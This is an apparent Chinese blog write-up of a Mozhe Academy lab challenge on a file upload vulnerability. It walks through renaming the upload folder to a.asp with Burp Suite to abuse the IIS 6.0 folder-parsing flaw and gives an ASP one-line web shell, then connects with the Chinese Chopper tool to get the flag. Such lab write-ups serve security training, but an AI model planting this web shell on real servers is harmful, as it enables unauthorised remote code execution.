题解--内部文件上传系统漏洞分析溯源---墨者学院(菜刀连接失败问题解决)

1.解题方向
1、试探允许上传的文件类型
2、观察服务器在处理完上传任务后返回的内容,获取上传路径
3、尝试修改上传路径,观察服务器是否允许写入权限
4.PS:使用菜刀时可能出现连接不上靶机,可以尝试点击左上角,有个重置缓存,很有可能是因为上次使用菜刀留下的缓存冲突了

进入靶场。
在这里插入图片描述

测试可上传的文件,发现txt,jpg,png等格式都可以上传

上传php、asp等都不能上传

2.由于txt可上传,所以可以在txt中写入一句话木马
在这里插入图片描述
文件上传到了一个asp文件中,所以可以考虑写入asp一句话
<%eval request(“a”)%>
3.开始操作
在这里插入图片描述

通过burpsuit抓包,修改upload为a.asp,可创建一个asp文件夹,然后放包通过。
在这里插入图片描述

文件成功传入a.asp文件夹,本题的关键就在这,为什么非得传入asp文件夹里,这是因为IIS的设计缺陷,只要上传的木马在ISS6.0环境中,并且存放在xxx.asp为名的文件夹下面,木马就被能执行

在这里插入图片描述
上传成功
上菜刀
在这里插入图片描述

拿到KEY。
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值